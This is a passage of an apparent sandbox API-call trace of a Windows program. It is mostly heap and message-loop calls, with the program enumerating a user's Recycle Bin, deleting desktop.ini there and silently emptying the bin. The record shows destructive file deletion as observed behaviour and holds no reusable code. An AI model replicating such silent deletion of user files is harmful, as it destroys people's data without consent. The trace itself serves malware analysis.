HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd078 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2b8 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd228 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd210 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd288 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfb8 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf70 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf40 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf88 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf10 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf58 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf28 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcef8 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcee0 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bceb0 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce80 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcec8 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce98 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce68 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce50 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce20 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcdf0 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce38 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce08 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcdd8 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcdc0 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcd90 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0050 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.833] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.833] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.833] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0199.834] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.834] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.834] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2460 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2400 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea60 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce68 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfd0 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd090 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2e8 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd138 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd060 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0a8 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcce8 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcca0 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bccd0 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcd00 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcd18 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcd48 | out: hHeap=0x8a0000) returned 1 [0199.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcd30 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcd78 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcd60 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd1e0 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd1b0 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd048 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcec8 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce80 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce98 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0199.835] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.835] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.860] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.860] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.860] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0199.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0199.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2480 | out: hHeap=0x8a0000) returned 1 [0199.860] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.860] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.861] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24e0 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0f0 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcdd8 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0c0 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce08 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce38 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce50 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcdf0 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd120 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bce20 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd000 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0199.861] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.861] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.861] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.861] GetFullPathNameW (in: lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", nBufferLength=0x7fff, lpBuffer=0x86f478, lpFilePart=0x0 | out: lpBuffer="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpFilePart=0x0) returned 0x3e [0199.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfa0 | out: hHeap=0x8a0000) returned 1 [0199.862] FindFirstFileW (in: lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*", lpFindFileData=0x87f4c0 | out: lpFindFileData=0x87f4c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName=".", cAlternateFileName="")) returned 0x91d5a8 [0199.862] FindNextFileW (in: hFindFile=0x91d5a8, lpFindFileData=0x87f4c0 | out: lpFindFileData=0x87f4c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="..", cAlternateFileName="")) returned 1 [0199.862] FindNextFileW (in: hFindFile=0x91d5a8, lpFindFileData=0x87f4c0 | out: lpFindFileData=0x87f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0199.862] DeleteFileW (lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0199.955] FindNextFileW (in: hFindFile=0x91d5a8, lpFindFileData=0x87f4c0 | out: lpFindFileData=0x87f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0199.955] FindClose (in: hFindFile=0x91d5a8 | out: hFindFile=0x91d5a8) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0050 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2450 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0d8 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24d0 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2480 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd1c8 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfe8 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.958] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dafd0 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2a0 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd258 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2500 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd198 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd318 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd300 | out: hHeap=0x8a0000) returned 1 [0199.958] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.977] SHEmptyRecycleBinW (hwnd=0x0, pszRootPath=0x0, dwFlags=0x7) returned 0x8000ffff [0201.206] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 1 [0201.206] TranslateMessage (lpMsg=0x87fa74) returned 0 [0201.206] DispatchMessageW (lpMsg=0x87fa74) returned 0x0 [0201.207] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87f110) returned 1 [0201.208] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0201.209] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0201.209] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2430 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca78 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0201.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X64", cchCount1=3, lpString2="X64", cchCount2=3) returned 2 [0201.209] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc808 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2430 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0201.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc7c0 [0201.209] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0201.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc808 [0201.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24b0 [0201.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64RevertWow64FsRedirection", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0201.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1e) returned 0x8df2f8 [0201.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64RevertWow64FsRedirection", cchWideChar=30, lpMultiByteStr=0x8df2f8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64RevertWow64FsRedirection", lpUsedDefaultChar=0x0) returned 30 [0201.210] Wow64RevertWow64FsRedirection (OlValue=0x1) returned 1 [0201.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24b0 [0201.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0201.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2430 [0201.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc808 [0201.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc7c0 [0201.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc7d8 [0201.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2420 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc7d8 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc7c0 | out: hHeap=0x8a0000) returned 1 [0201.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc7c0 [0201.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc7d8 [0201.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc790 [0201.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2420 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc790 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc7d8 | out: hHeap=0x8a0000) returned 1 [0201.211] FreeLibrary (hLibModule=0x75990000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc7f0 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8b0 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8f8 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc880 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8c8 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc850 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc898 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc820 | out: hHeap=0x8a0000) returned 1 [0201.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc868 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc838 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc808 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc7c0 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca30 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca78 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9e8 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, 